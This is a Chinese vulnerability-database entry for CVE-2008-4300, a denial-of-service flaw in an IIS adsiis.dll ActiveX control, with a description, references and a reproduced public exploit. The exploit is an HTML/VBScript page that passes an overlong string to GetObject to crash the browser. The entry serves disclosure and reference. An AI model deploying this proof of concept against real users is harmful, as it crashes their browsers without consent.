Microsoft Internet Information Services (IIS) adsiis.dll GetObject方法拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1185113 漏洞类型 输入验证
发布时间 2008-09-29 更新时间 2008-09-29
CVE编号 CVE-2008-4300 CNNVD-ID CNNVD-200809-404
漏洞平台 N/A CVSS评分 5.0
|漏洞来源
https://www.securityfocus.com/bid/84830
https://cxsecurity.com/issue/WLB-2008100092
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200809-404
|漏洞详情
MicrosoftIIS是运行于Windows上的WEB服务系统。MicrosoftInternetInformationServices(IIS)的adsiis.dll中的某个ActiveX控件,会允许远程攻击者通过对GetObject方法的第二自变量中的一个长字符串来造成拒绝服务(浏览器崩溃)。
|漏洞EXP
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""

"""  :::::: ::   ::       ::        ::  ::  ::::        """

"""  ::      :: ::        :: :::::: .. ::::   ::        """

"""  :::::    :::   ::::: :: ::  :: ::  ::  ::::        """

"""  ::      :: ::  ::  : :: ::  :: ::  ::    ::        """

"""  :::::: ::   :: ::::: :: :::::: ::  ::  :::: rs.ir  """

"""                 ::                                  """

"""                                                     """

"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""

# Tilte: adsiis.dll activex remote DOS

# Exp0iters member (order by alphabet) .........: [Ciph3r,Hamedeta,Rake,Sh3llh3ll,the_Edit0r]

# Author........................................: [hamedata]

# E-mail........................................: [hamedata (at) gmail (dot) com [email concealed]]

# Location .....................................: [Iran]

# Software .....................................: [Inernet Information Service]

# Sp Tanx2 .....................................: [ALL HACKERS]

# Vulnerability: Remote DOS Exploit

# Part Expl0it & Bug Codes :

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-

<html>

<object classid='clsid:D6BFA35E-89F2-11D0-8527-00C04FD8D503' id='target' /></object>

<input language=VBScript onclick=try() type=button value='start'>

<script language='vbscript'>

Sub try

first_arg="expl0iters"

OF=String(7188, "A")

target.GetObject first_arg ,OF

End Sub

</script>

</html>

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-

# Part Contact :

Contact me : hamedata (at) gmail (dot) com [email concealed]

Contact Expl0iters team : the_3dit0r[at]Yahoo[dot]coM
|受影响的产品
Microsoft IIS 0
|参考资料

来源:XF
名称:iis-adsiis-activex-dos(45584)
链接:http://xforce.iss.net/xforce/xfdb/45584
来源:BUGTRAQ
名称:20080924InternetInformationService(adsiis.dll)activexremoteDOS
链接:http://www.securityfocus.com/archive/1/archive/1/496696/100/0/threaded
来源:SREASON
名称:4325
链接:http://securityreason.com/securityalert/4325